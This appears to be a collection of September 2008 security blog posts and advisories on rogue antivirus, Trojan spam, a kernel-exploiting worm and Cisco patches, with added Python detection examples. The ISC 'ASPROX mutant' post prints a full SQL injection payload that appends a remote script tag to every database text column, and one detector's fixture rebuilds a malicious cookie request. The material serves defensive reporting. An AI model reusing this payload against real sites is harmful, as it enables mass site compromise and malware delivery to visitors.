September 2008 - Posts

Really Legal Stuff
Posted by Sean @ 16:16 GMT


WinDefender 2008 is a rogue application. Rogues are also sometimes known as scareware.
[Screenshot: Spyware Rogue : WinDefender 2008]
Looks sort of familiar, doesn't it? Do you recognize the shape of the box?
The website creators appear to have "borrowed" a few things.
Let's check out the legal disclaimer.
[Screenshot: Spyware Rogue : WinDefender 2008 : Really Legal Stuff]
Hey — Really Legal Stuff — That's impressive. Where else can we find really legal stuff?
[Screenshot: Spyware Rogue : Antivirus XP 2008 : Really Legal Stuff]
Oh, Antivirus XP 2008. That particular rogue is a huge pain in the… neck.
The guys that produce this stuff are crooks and swindlers.
[Screenshot: Spyware Rogue : Antivirus XP 2008]
Here's a tip: If they claim to be REALiable — they're probably FAKE.
P.S. Performing a search for "really legal stuff" produces some very interesting but definitely NOT safe for work results.
Avoid following the links.

Sep29

Warning: Spam With Trend Micro Logo Delivers Trojan

by Eduardo Godinho (Threats Analyst)

While not as massive as earlier Web attacks that have used similar social engineering techniques, a new spamming operation has malware criminals using the logo of Trend Micro to lure unsuspecting Web users to “Trojanize” themselves.

Here’s a screenshot of a bogus email message that potential victims in Brazil have been receiving in the past several days:

Figure 1. Portuguese spam using the Trend Micro, Inc. logo

These messages, written in Portuguese, inform the recipients that they contain pictures supposedly requested by the recipients themselves. The bogus “picture” is purportedly available for download from a link found in the email body.

The message also carries the Trend Micro logo as a sort of “guarantee” to users that the file they are about to download is legitimate.

The link, when accessed, does not lead to any image file but installs a Trojan Horse program instead.

Users are perpetually reminded to be careful in handling links in the messages they receive. Just the mere mention of an online security company or the appearance of its logo does not guarantee that the message and its contents are legitimate and not harmful to systems. Logos after all are easy to copy or fake.

Trend Micro Smart Protection Network already blocks the spammed email messages involved in this threat. It also protects users from TROJ_GENERIC by detecting the Trojan at the desktop level and by providing solutions for its removal.

Sep29

In The Virtual Crime World, Merrill Lynch Follows Wachovia’s Fate

by Reuben Mercado (Technical Communications)

Financial crisis or no financial crisis, banks have emerged as social engineering standards. However, as floundering financial institutions take center stage in the public’s consciousness, users may become more susceptible to banking-related ploys.

Less than a week ago, TrendLabs reported on a scheme targeting Wachovia, the fourth largest banking chain in the US. This time, an almost identical plot has been set using Merrill Lynch as bait. The storied firm has received a sizable amount of media attention lately due to its high-profile bailout by the Bank of America.

The spam email message may appear as such:

[Screenshot] Figure 1. Fake Merrill Lynch spam

While those on social engineering watch may expect a frenzied appeal to buck up security in the face of the financial crisis, this scheme actually comes off cool and collected.

Trend Micro Advanced Threats Researcher Ivan Macalintal notes the use of very long, legitimate-looking URLs contained in hyperlinks on the spammed email messages. “[We] haven’t seen this for quite some time. [It] looks legit in a way but [then], you have to dig deeper,” Ivan says.

Clicking on the links will result in the download of malware detected as BKDR_AGENT.AWAF. It compromises system security, possibly allowing a remote user to issue commands on the affected system. It also drops TROJ_ROOTKIT.FX, which has rootkit capabilities used to hide malicious files and processes and to ensure memory residency. One may remember TROJ_ROOTKIT.FX as the same malware found in the recent Wachovia spam, suggesting that this is possibly the work of the same malware author.

Sep29
by Roderick Ordoñez (Technical Communications)

After fake sites, fake Antivirus, fake blogs, and fake forums, spammers plough on with fake news.

Threat analyst Juan Pablo Castro reports of spam announcing the declaration of World War III.

[Screenshot] Figure 1. Sample spam that warns of World War 3
[Screenshot] Figure 2. Another sample spam that warns of World War 3

The link provided points to a legitimate-looking CNN page with a video. However, users wishing to view this video are prompted to install an ActiveX Object:

[Screenshot] Figure 3. Missing ActiveX object is actually spyware

Note that CNN’s real URL is http://www.cnn.com.

The supposed ActiveX Object is actually malware, which Trend Micro detects as TSPY_BANCOS.JN. TSPY_BANCOS.JN, like all BANCOS variants, is an info stealer that monitors the browser of the affected system. It waits for the user to access certain banking-related Web sites, then spoofs the login pages of the bank Web site to steal sensitive account information.

The request to install an ActiveX Object is a popular ploy to spread malware these days, and this bogus ActiveX Object is yet another one designed to deceive the user to believe that he’s installing something useful.

Then again, the use of sensational headlines is nothing new, and spammers are constantly churning their creative juices to invent the most inviting email subjects. Though Trend Micro products already block the malicious URL, the spam and the related malware through Smart Protection Network, users are advised to do the following for the next spam that finds its way to their inboxes:

Never reply. Never click. Never believe.

Threats that come along with SNS websites


1. SNS websites introduced
With the Web 2.0 trend, Social Networking Services (SNS) websites have become very popular; Facebook and MySpace, for example, are well known.

You can keep in contact with others via SNS websites and find many friends. Many people participate in small games, virtual applications and so on. These SNS websites have millions of unique visitors per day. They are platforms used to share files, music, information and so on, and the same platforms can be used to spread viruses and worms. If an attacker spreads a virus, trojan or worm via an SNS website, many users can be infected in a short time, which could be disastrous.

In the following sections I will talk about how to reduce the threat that comes along with SNS websites.

2. SNS websites lead to threats
Nowadays, more attackers make use of SNS websites. They can easily build a zombie network via an SNS website vulnerability, and they can use harvested private information for financial gain.

3. General attack methods
Attackers may use the following methods of attack:
a) Exploit a server vulnerability
For example: buffer overflows, weak passwords, database vulnerabilities and so on.
b) Exploit a script vulnerability
For example: SQL injection, cross-site scripting, file upload problems and so on. In general, cross-site scripting attacks are widely used. A cross-site scripting (XSS) worm can collect millions of user cookies in one hour, and can also lead millions of users to an infectious virus.
c) Exploit an ActiveX vulnerability
If an ActiveX vulnerability is present, attackers are likely to target it. In general, attackers exploit ActiveX overflow vulnerabilities to install malware.
d) Use of social engineering fundamentals
It is well known that users of SNS websites trust each other, so social engineering works well on SNS sites.

4. Attack cases
a) Facebook and MySpace have had ActiveX-related vulnerabilities in the past.
b) In 2006, MySpace was hit by an XSS worm. The worm used a malicious QuickTime video.

Patchbag: WinZip / MPlayer / RealWin SCADA vuln

Published: 2008-09-29,
Last Updated: 2008-09-29 20:28:18 UTC
by Daniel Wesemann (Version: 1)

A couple of patches: the WinZip 11 on Windows 2000 GDI library vulnerability: http://update.winzip.com/wz112sr1.htm and an MPlayer buffer overflow: http://www.ocert.org/advisories/ocert-2008-013.html

Further, the RealFlex RealWin 2.0 SCADA system seems vulnerable to a remote unauthenticated buffer overflow. No patch yet. If you run this software on your SCADA network, now is the time to double-check that you have port tcp/910 properly filtered. Otherwise, soon enough, someone else will be checking for you: http://www.securityfocus.com/archive/1/496759 and http://xforce.iss.net/xforce/xfdb/45465

Sep25
by Rex Sumo (Fraud Analyst)

Cyber criminals continue to use the popular social networking site Facebook to bait users.

A new threat follows the phishing operation that we blogged about just two weeks ago.

This current Facebook threat begins with the following spammed email message:

This bogus message tells recipients that a friend has added them to their social networking circle. Besides using a legitimate email address, the perpetrators also copied the format of the legitimate Facebook page.

All of the links found in the message body lead potential victims directly to the legitimate Facebook site, with the exception of the login button, which draws a blank page because of an intentionally incorrect URL format.

Potential victims who think the attachment reveals “their mysterious friend” may actually be tricked into opening it.

The attached .ZIP file supposedly contains a photo, but when unzipped it contains an executable named picture instead.

The .EXE file is a worm that Trend Micro detects as WORM_AUTORUN.EAT.

Interestingly, two notable worms (WORM_KOOBFACE.E and WORM_KOOBFACE.D) used Facebook a month ago in their propagation routines. Popular social networking sites are clearly targeted by cyber criminals who are intent on infecting more users.

The Trend Micro Smart Protection Network already blocks the spammed email message before it reaches our users’ inboxes. It also detects WORM_AUTORUN.EAT at the desktop level and provides solutions for the removal of the worm. Web users are advised to refrain from downloading attachments in unexpected email messages, as these attachments may prove harmful to their systems.
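As an added illustration (not TrendLabs code), the following Python script inspects a ZIP attachment of the kind described above for members that are executables, including an executable renamed with an image extension. The archive it scans is constructed in memory, so its file names and contents are made up for the example.

```python
"""Inspect an e-mail attachment ZIP for executables posing as a photo.

Added example, not TrendLabs code. The archive is built in memory so the
script runs offline; file names and contents are constructed.
"""
import io
import os
import zipfile

# File types Windows runs when double-clicked (illustrative subset).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js"}


def classify_entry(name: str, head: bytes) -> str:
    """Describe why one archive member is suspicious, or return "" if it is not.

    Two checks: an executable extension, and a Windows PE header (the
    'MZ' magic) under any extension, which catches an .exe renamed .jpg.
    """
    ext = os.path.splitext(name.lower())[1]
    if ext in EXECUTABLE_EXTS:
        return f"{name}: executable extension {ext}"
    if head[:2] == b"MZ":
        return f"{name}: PE header (MZ) despite extension {ext or '(none)'}"
    return ""


def scan_zip_bytes(data: bytes) -> list:
    """Scan a ZIP held in memory; return one finding per suspicious member."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)   # only the magic bytes are needed
            finding = classify_entry(info.filename, head)
            if finding:
                findings.append(finding)
    return findings


def build_sample_zip() -> bytes:
    """Constructed archive mimicking the attachment described above.

    One real-looking JPEG, the executable named "picture", and an
    executable renamed to look like a picture.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("holiday.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16)  # JPEG magic
        zf.writestr("picture.exe", b"MZ" + b"\x90" * 62)                # fake PE stub
        zf.writestr("picture.jpg", b"MZ" + b"\x90" * 62)                # PE hiding as image
    return buf.getvalue()


if __name__ == "__main__":
    for line in scan_zip_bytes(build_sample_zip()):
        print("SUSPICIOUS:", line)
```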

A Different Twist on the Path to the Kernel
Posted by Response @ 14:52 GMT

Now here's something we don't see every day.

It's an interesting twist on an old tactic — a worm that uses a local elevation of privilege vulnerability to access the kernel and execute code.

Most malware with rootkit functionality will tamper with the Windows kernel and attempt to execute code in kernel mode. Typically, a special driver is used to do this.

Worm.Win32.AutoRun.nox has a payload that restores the original function pointers back to the kernel's System Service Table (SST). The usual motivation for malware to do this is to remove any SST hooks installed by security software or other malware that might affect its successful operation.

As noted, normally a special driver or the physical memory device is used to get access to kernel-mode memory to restore the pointers. AutoRun.nox is different — it uses the "GDI Local Elevation of Privilege Vulnerability (CVE-2006-5758)" to do the job. For malware, it's rather unique to see such a technique being used.

This vulnerability is due to an error in handling a shared memory structure, which allows the structure to be remapped from read-only to writable. April 2007's update patched the vulnerability.

Antivirus :  Worm:W32/AutoRun.GM

After remapping the memory, the malware will initialize a CPalette object. It will then search for the palette object in the shared kernel memory structure. Since the memory is now writable, it can be altered to include a pointer to a special function that will remove any existing SST hooks. Finally, a call to GetNearestPaletteIndex will indirectly cause the function to be executed. Afterwards, the palette object is restored leaving no trace of the attack.

If attacking this vulnerability fails, the worm goes back to the tried-and-true "special driver" method. The driver is detected by us as Rootkit:W32/Agent.UG.

Either way, if the attack is successful, the machine is compromised as the attacker can access the kernel and execute code, or cause a denial of service.

This attack will only work on unpatched machines running without the latest updates. Microsoft ranks this vulnerability as Important and recommends that users apply the update immediately.

Foresight? From: http://technet.microsoft.com/en-us/library/cc750820.aspx

"With this new release, the Window Manager, GDI, and related graphics device drivers have been moved to the Windows NT Executive running in kernel mode."

Response team post by — Lordian, Kimmo, Antti ...and Mika

ASPROX mutant

Published: 2008-09-29,
Last Updated: 2008-09-29 10:22:25 UTC
by Daniel Wesemann (Version: 1)

ISC reader Mike wrote in to share an interesting new twist on the ongoing SQL injections. What he found in his logs was the following:

POST /removed.asp HTTP/1.1
Cookie: start=S end=Z%3BDECLARE%20@S%20VARCHAR(4000)%3BSET%20@S%3DCAST(0x44454....
Content-Type: application/x-www-form-urlencoded
Host: removed
Content-Length: 3
Expect: 100-continue
Connection: Keep-Alive

The injection itself (starting with DECLARE...) looks a lot like the technique used by ASPROX (see our earlier diary), but that the injection attempt here is made not via the URL but rather via a cookie is a new twist. Mike was able to capture the full code block:

DECLARE @T varchar(255),@C varchar(255),@X varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name,b.name,b.xtype from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or
b.xtype=167) and a.name<>'dtproperties' and a.id not in(select parent_obj
from sysobjects where xtype='d') OPEN Table_Cursor FETCH NEXT FROM
Table_Cursor INTO @T,@C,@X WHILE(@@FETCH_STATUS=0) BEGIN if (@X=167 or
@X=231) exec('alter table ['+@T+'] alter column ['+@C+']
varchar(1000);update ['+@T+'] set ['+@C+']=['+@C+']+''<script
src=hxxp://ytgw123:cn></script>''') else exec('update ['+@T+'] set
['+@C+']=rtrim(convert(varchar(2000),['+@C+']))+''<script
src=hxxp://ytgw123:cn></script>''') FETCH NEXT FROM Table_Cursor INTO
@T,@C,@X END CLOSE Table_Cursor DEALLOCATE Table_Cursor

While this again looks reasonably similar to the earlier injections, we haven't seen this particular form before. The URL has been defanged above, but is still live. It dishes out a handful of exploits, and in the end delivers a file called "x.exe" that looks like yet another password stealer, but has poor detection at this time (Virustotal). One of the exploits contains the string "I LOVE gameee TEAM".  Well: We don't.

Please let us know if you see attempted SQL injection via cookies in your logs.
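Added example, not part of the ISC diary: a small Python detector for the cookie-carried injection shown above. It URL-decodes the Cookie header, matches the DECLARE ... CAST(0x...) pattern, and decodes the hex blob so the embedded T-SQL can be read. The two sample requests and the hex payload are constructed for the example (the real blob is truncated on the page).

```python
"""Detect ASPROX-style SQL injection carried in the HTTP Cookie header.

Added example (not ISC code). Parses raw requests of the shape captured
above, URL-decodes the Cookie header, matches the DECLARE/CAST(0x...)
pattern and decodes the hex blob so the hidden T-SQL becomes readable.
All sample requests below are constructed for the example.
"""
import re
from typing import Optional
from urllib.parse import unquote

# After URL-decoding, the injection declares a VARCHAR variable and then
# assigns it CAST(0x<hex> AS VARCHAR(...)); the hex is the real payload.
INJECT_RE = re.compile(
    r"DECLARE\s+@\w+\s+N?VARCHAR\s*\(\s*\d+\s*\).*?CAST\s*\(\s*0x([0-9A-Fa-f]+)",
    re.IGNORECASE | re.DOTALL,
)


def parse_request(raw: str) -> dict:
    """Split one raw HTTP request into its request line and a header dict."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        if not line.strip():          # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"request_line": lines[0], "headers": headers}


def decode_hex_payload(hexstr: str) -> str:
    """Turn the CAST(0x...) argument back into SQL text.

    The captured sample begins 0x44454..., i.e. the bytes 'DE...' of DECLARE,
    so it is a plain one-byte-per-character string; interleaved NUL bytes
    would instead indicate the UTF-16 form used with NVARCHAR.
    """
    raw = bytes.fromhex(hexstr)
    if len(raw) >= 2 and raw[1] == 0:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def inspect_cookie(raw_request: str) -> Optional[dict]:
    """Return a finding for an injected Cookie header, or None if it looks clean."""
    req = parse_request(raw_request)
    cookie = req["headers"].get("cookie")
    if not cookie:
        return None
    decoded = unquote(cookie)
    match = INJECT_RE.search(decoded)
    if not match:
        return None
    payload = decode_hex_payload(match.group(1))
    low = payload.lower()
    return {
        "request_line": req["request_line"],
        "payload_preview": payload[:60],
        # The ASPROX block walks sysobjects/syscolumns to hit every text column.
        "asprox_like": "sysobjects" in low and "syscolumns" in low,
    }


def scan_requests(requests) -> list:
    """Run inspect_cookie over many raw requests; keep only the hits."""
    return [f for f in (inspect_cookie(r) for r in requests) if f]


# Constructed stand-in for the hex blob, built from a shortened version of the
# SQL block quoted above; the page's own blob is truncated ("0x44454....").
SAMPLE_SQL = ("DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
              "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id")
SAMPLE_HEX = SAMPLE_SQL.encode("latin-1").hex().upper()

MALICIOUS_REQUEST = (
    "POST /removed.asp HTTP/1.1\n"
    "Cookie: start=S end=Z%3BDECLARE%20@S%20VARCHAR(4000)%3BSET%20@S%3DCAST(0x"
    + SAMPLE_HEX + "%20AS%20VARCHAR(4000))%3BEXEC(@S)%3B--\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "Host: removed\n"
    "Content-Length: 3\n"
)

BENIGN_REQUEST = (
    "GET /index.asp HTTP/1.1\n"
    "Cookie: start=S; end=Z; session=abc123\n"
    "Host: removed\n"
)

if __name__ == "__main__":
    for hit in scan_requests([MALICIOUS_REQUEST, BENIGN_REQUEST]):
        print("SQLi via cookie:", hit["request_line"], "->", hit["payload_preview"])
```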

Firefox v2.0.0.17 and Thunderbird v2.0.0.17 release fixes vulnerabilities

Published: 2008-09-26,
Last Updated: 2008-09-26 20:01:11 UTC
by Patrick Nolan (Version: 1)

Firefox 2 v2.0.0.17 is available for download and corrects the vulnerabilities listed at "Security Advisories for Firefox 2.0 - Fixed in Firefox 2.0.0.17". "Firefox 2.0.0.x will be maintained with security and stability updates until mid-December, 2008. All users are strongly encouraged to upgrade to Firefox 3".

Thunderbird 2 v2.0.0.17 is available for download and corrects the vulnerabilities at "Security Advisories for Thunderbird 2.0 - Fixed in Thunderbird 2.0.0.17".

Thanks Raul!

CISCO bi-annual patch day

Published: 2008-09-25,
Last Updated: 2008-09-26 03:16:41 UTC
by donald smith (Version: 1)

With the numerous CISCO vulnerabilities announced today we thought you might appreciate a table summarising the issues.

The table shows that many of the issues have a workaround. Unfortunately, this is typically in the form of disabling the functionality, which may not be an option for many of you. CISCO uses the CVSS scoring system, which relates the score to the core Confidentiality, Integrity and Availability principles. The higher the score, the more important the vendor believes the issue is.

Columns: # (advisory) | Impact/CVE(s) | Exploit | Cisco Rating (Base / Temp) | Workaround/Fix | ISC Rating* | Handler Comments

#: cisco-sa-20080924-iosips
Description: The Cisco IOS Intrusion Prevention System (IPS) feature contains a vulnerability in the processing of certain IPS signatures that use the SERVICE.DNS engine. This vulnerability may cause a router to crash or hang, resulting in a denial of service condition.
Impact/CVE(s): IOS IPS, CVE-2008-2739
Exploit: none known
Cisco Rating (Base / Temp): 7.8 / 6.4
Workaround/Fix: Y/Y
ISC Rating*: Critical
Handler Comments: CISCO IDS is not affected.

#: cisco-sa-20080924-ssl
Description: A Cisco IOS device may crash while processing an SSL packet. This can happen during the termination of an SSL-based session. The offending packet is not malformed and is normally received as part of the packet exchange.
Workaround: Disable services (secure-server, webvpn, or OSP settlement); limit exposure via ACL.
Impact/CVE(s): IOS SSL, CVE-2008-3798
Exploit: none known
Cisco Rating (Base / Temp): 7.8 / 6.4
Workaround/Fix: Y/Y
ISC Rating*: Critical
Handler Comments: This affects management using SSL as well. The workaround will disable this.

#: cisco-sa-20080924-sip
Description: Multiple vulnerabilities exist in the Session Initiation Protocol (SIP) implementation in Cisco IOS that can be exploited remotely to trigger a memory leak or to cause a reload of the IOS device.
Workaround: Disable services if not needed or limit exposure via ACL.
Impact/CVE(s): DOS, CVE-2008-3800, CVE-2008-3801, CVE-2008-3802
Exploit: none known
Cisco Rating (Base / Temp): 7.8 / 6.4
Workaround/Fix: Y/Y
ISC Rating*: Important
Handler Comments: SIP can use UDP -> the src_IP is spoofable, which may negate the effects of an ACL intended to limit your exposure.

#: cisco-sa-20080924-cucm
Description: Cisco Unified Communications Manager, formerly Cisco Unified CallManager, contains two denial of service (DoS) vulnerabilities in the Session Initiation Protocol (SIP) service. An exploit of these vulnerabilities may cause an interruption in voice services.
Impact/CVE(s): DOS, CVE-2008-3800, CVE-2008-3801
Exploit: none known
Cisco Rating (Base / Temp): 7.1 and 7.8 / 5.9 and 6.4
Workaround/Fix: Y/Y
ISC Rating*: Critical
Handler Comments: SIP can use UDP -> the src_IP is spoofable, which may negate the effects of an ACL intended to limit your exposure. Can be triggered with valid SIP msgs. CUCM versions > 5.x have SIP enabled by default and it can not be disabled.

#: cisco-sa-20080924-vpn
Description: Devices running Cisco IOS versions 12.0S, 12.2, 12.3 or 12.4 and configured for Multiprotocol Label Switching (MPLS) Virtual Private Networks (VPNs) or VPN Routing and Forwarding Lite (VRF Lite) and using Border Gateway Protocol (BGP) between Customer Edge (CE) and Provider Edge (PE) devices may permit information to propagate between VPNs.
Impact/CVE(s): Data Leak, CVE-2008-3803
Exploit: none known
Cisco Rating (Base / Temp): 5.1 / 4.3
Workaround/Fix: Y/Y
ISC Rating*: Important
Handler Comments: A bug exists when processing extended communities with MPLS VPNs. If extended communities are used, MPLS VPN may incorrectly use a corrupted route target (RT) to forward traffic. If this occurs, traffic can leak from one MPLS VPN to another.

#: cisco-sa-20080924-mfi
Description: Cisco IOS Software Multi Protocol Label Switching (MPLS) Forwarding Infrastructure (MFI) is vulnerable to a Denial of Service (DoS) attack from specially crafted packets. Only the MFI is affected by this vulnerability. The older Label Forwarding Information Base (LFIB) implementation, which is replaced by MFI, is not affected.
Impact/CVE(s): DOS, CVE-2008-3804
Exploit: none known
Cisco Rating (Base / Temp): 7.8 / 6.4
Workaround/Fix: N/Y
ISC Rating*: Critical
Handler Comments: An attacker needs to have access to the MPLS network through an MPLS-enabled interface. MPLS packets are dropped on interfaces that are not configured for MPLS. No workaround.

#: cisco-sa-20080924-ipc
Description: Cisco 10000, uBR10012 and uBR7200 series devices use a User Datagram Protocol (UDP) based Inter-Process Communication (IPC) channel that is externally reachable. An attacker could exploit this vulnerability to cause a denial of service (DoS) condition on affected devices.
Workaround: Filter packets that are sent to 127.0.0.0/8 and towards UDP port 1975.
Impact/CVE(s): DOS, CVE-2008-3805
Exploit: none known
Cisco Rating (Base / Temp): 8.5 / 7
Workaround/Fix: Y/Y
ISC Rating*: Critical
Handler Comments: An attacker needs to get a packet with a destination address in the 127./8 range to the router, which implies being directly connected or the use of a default route.

#: cisco-sa-20080924-ubr
Description: Cisco uBR10012 series devices automatically enable Simple Network Management Protocol (SNMP) read/write access to the device if configured for linecard redundancy. This can be exploited by an attacker to gain complete control of the device.
Workaround: Change Community String.
Impact/CVE(s): DOS, CVE-2008-3807
Exploit: none known
Cisco Rating (Base / Temp): 10 / 8.3
Workaround/Fix: Y/Y
ISC Rating*: PATCH NOW
Handler Comments: When linecard redundancy is enabled on a Cisco uBR10012 series device, SNMP is also automatically enabled with a default community string of private that has read/write privileges. Since there are no access restrictions on this community string, it may be exploited by an attacker to gain complete control of the device. SNMP can use UDP -> the src_IP is spoofable, which may negate the effects of an ACL intended to limit your exposure.

#: cisco-sa-20080924-multicast
Description: Two crafted Protocol Independent Multicast (PIM) packet vulnerabilities exist in Cisco IOS software that may lead to a denial of service (DoS) condition.
Workaround: Specify trusted PIM neighbors and/or enable infrastructure ACLs to limit exposure.
Impact/CVE(s): DOS, CVE-2008-3809
Exploit: none known
Cisco Rating (Base / Temp): 7.8 / 6.4
Workaround/Fix: Y/Y
ISC Rating*: PATCH NOW
Handler Comments: PIM src_IP is spoofable, which may negate the effects of an ACL intended to limit your exposure.

#: cisco-sa-20080924-sccp
Description: A series of segmented Skinny Call Control Protocol (SCCP) messages may cause a Cisco IOS device that is configured with the Network Address Translation (NAT) SCCP Fragmentation Support feature to reload.
Impact/CVE(s): DOS, CVE-2008-3810, CVE-2008-3811
Exploit: none known
Cisco Rating (Base / Temp): 7.8 / 6.4
Workaround/Fix: Y/Y
ISC Rating*: PATCH NOW
Handler Comments: Infrastructure ACLs and on-device ACLs should be viable mitigations but are not mentioned in the Cisco advisory. Moving the port from the default of 2000 would also make this a bit harder to exploit. You would need to modify the port on both the call manager and the IOS device supporting SCCP.

#: cisco-sa-20080924-iosfw
Description: Cisco IOS software configured for IOS firewall Application Inspection Control (AIC) with an HTTP configured application-specific policy is vulnerable to a Denial of Service when processing a specific malformed HTTP transit packet. Successful exploitation of the vulnerability may result in a reload of the affected device.
Impact/CVE(s): DOS, CVE-2008-3812
Exploit: none known
Cisco Rating (Base / Temp): 7.8 / 6.4
Workaround/Fix: N/Y
ISC Rating*: PATCH NOW
Handler Comments: No workaround other than disabling HTTP Deep Packet Inspection.

#: cisco-sa-20080924-l2tp
Description: Several features enable the L2TP mgmt daemon process within Cisco IOS software, including but not limited to Layer 2 virtual private networks (L2VPN), Layer 2 Tunnel Protocol Version 3 (L2TPv3), Stack Group Bidding Protocol (SGBP) and Cisco Virtual Private Dial-Up Networks (VPDN). Once this process is enabled the device is vulnerable.
Workaround: Enable infrastructure ACLs to limit exposure.
Impact/CVE(s): DOS, CVE-2008-3813
Exploit: none known
Cisco Rating (Base / Temp): 7.8 / 6.4
Workaround/Fix: Y/Y
ISC Rating*: Critical
Handler Comments: L2TP can use UDP -> the src_IP is spoofable, which may negate the effects of an ACL intended to limit your exposure.

(*): ISC rating

  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

Happy Patching

Don & Mark

From the SANS NewsBites newsletter today:

--Researchers Find Users Often Click Through Dialog Windows Without Reading (September 23 & 25, 2008) An experiment conducted by psychologists at North Carolina State University found that computer users often fail to distinguish fake Windows dialog boxes from legitimate ones. Sixty-three percent of the 42 students participating in the experiment clicked OK whenever a pop-up window appeared, ignoring anomalies that should have clued them in to the potential for malicious activity. The subjects appeared to view pop-up windows as hindering their intended activity; clicking the OK button is the virtual equivalent of brushing away flies.

http://www.networkworld.com/news/2008/092508-computer-users-overeager-to-click.html?hpg1=bn

http://arstechnica.com/news.ars/post/20080923-study-confirms-users-are-idiots.html

[Editor's Note (Schultz): This research confirms the obvious, but it is nevertheless significant in that it provides controlled, experimental data that shed some light on the magnitude of the problem of users clicking OK just to get rid of security related dialog boxes that pop up.]

Cisco Unified Communications Manager SIP Denial of Service Vulnerabilities
Secunia Advisory: SA32013
Release Date: 2008-09-25
Critical: Moderately critical
Impact: DoS
Where: From remote
Solution Status: Unpatched
Software: Cisco Unified CallManager 4.x, Cisco Unified Communications Manager 5.x, Cisco Unified Communications Manager 6.x
CVE reference: CVE-2008-3800, CVE-2008-3801


Description:
Some vulnerabilities have been reported in Cisco Unified Communications Manager, which can be exploited by malicious people to cause a DoS (Denial of Service).

Multiple unspecified errors exist in the processing of SIP messages, which can be exploited to cause a reload of an affected device.

This is related to vulnerability #5 in SA31990.

The following versions are affected:
* Cisco Unified CallManager 4.1 versions prior to 4.1.3SR8
* Cisco Unified CallManager 4.2 versions prior to 4.2(3)SR4b
* Cisco Unified CallManager 4.3 versions prior to 4.3(2)SR1a
* Cisco Unified Communications Manager 5.x versions prior to 5.1(3d)
* Cisco Unified Communications Manager 6.x versions prior to 6.1(2)su1

Solution:
The vendor will release updated versions that fix these vulnerabilities (please see vendor advisory for details).

Restrict network access to the affected services.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml

Other References:
SA31990
http://secunia.com/advisories/31990/

Cisco IOS Multiple Vulnerabilities
Secunia Advisory: SA31990
Release Date: 2008-09-25
Critical: Moderately critical
Impact: Exposure of sensitive information, DoS, System access
Where: From remote
Solution Status: Vendor Patch
OS: Cisco IOS 12.x, Cisco IOS R12.x
CVE reference: CVE-2008-2739, CVE-2008-3798, CVE-2008-3799, CVE-2008-3800, CVE-2008-3801, CVE-2008-3802, CVE-2008-3803, CVE-2008-3804, CVE-2008-3805, CVE-2008-3807, CVE-2008-3808, CVE-2008-3809, CVE-2008-3810, CVE-2008-3811, CVE-2008-3812, CVE-2008-3813


Description:
Some vulnerabilities have been reported in Cisco IOS, which can be exploited by malicious people to disclose sensitive information, cause a DoS (Denial of Service), or to compromise a vulnerable system.

1) An unspecified error exists in the processing of SSL packets during the termination of an SSL session, which can potentially be exploited to crash an affected system.

2) Two unspecified errors exist within the processing of Protocol Independent Multicast (PIM) packets, which can be exploited to cause an affected device to reload.

3) Unspecified errors within the processing of segmented Skinny Call Control Protocol (SCCP) messages can be exploited to cause a Cisco IOS device to reload.

Successful exploitation requires that the device is configured with Network Address Translation (NAT) SCCP Fragmentation Support.

4) A memory leak in the processing of Session Initiation Protocol (SIP) messages can be exploited to cause a DoS for all voice services.

5) Multiple unspecified errors exist in the processing of SIP messages, which can be exploited to cause a reload of an affected device.

6) An unspecified error in the IOS Intrusion Prevention System (IPS) feature when processing certain IPS signatures that use the SERVICE.DNS engine can be exploited to cause a DoS via specially crafted network traffic.

7) A security issue exists in the processing of extended communities with Multi Protocol Label Switching (MPLS) Virtual Private Networks (VPN), which can lead to traffic leaking from one MPLS VPN to another.

This security issue does not affect Cisco IOS releases based on 12.1.

NOTE: This security issue was introduced with CSCee83237. Cisco IOS images that do not include CSCee83237 are reportedly not affected.

8) An unspecified error within the Multi Protocol Label Switching (MPLS) Forwarding Infrastructure (MFI) can be exploited to cause a DoS via specially crafted network packets.

Successful exploitation requires access to the MPLS network.

9) An unspecified error within the Application Inspection Control (AIC) can be exploited to cause a reload of an affected device via specially crafted HTTP packets.

10) An unspecified error in the processing of Layer 2 Tunneling Protocol (L2TP) packets can be exploited to cause an affected device to reload via specially crafted L2TP packets.

Successful exploitation requires that the L2TP mgmt daemon process is running. This process may be enabled e.g. via Layer 2 virtual private networks (L2VPN), Layer 2 Tunnel Protocol Version 3 (L2TPv3), Stack Group Bidding Protocol (SGBP), or Cisco Virtual Private Dial-Up Networks (VPDN).

11) An unspecified error exists in the processing of IPC messages. This can be exploited to reload an affected device via a specially crafted UDP packet sent to port 1975.

This vulnerability is reported in Cisco 10000, uBR10012, and uBR7200 series devices.

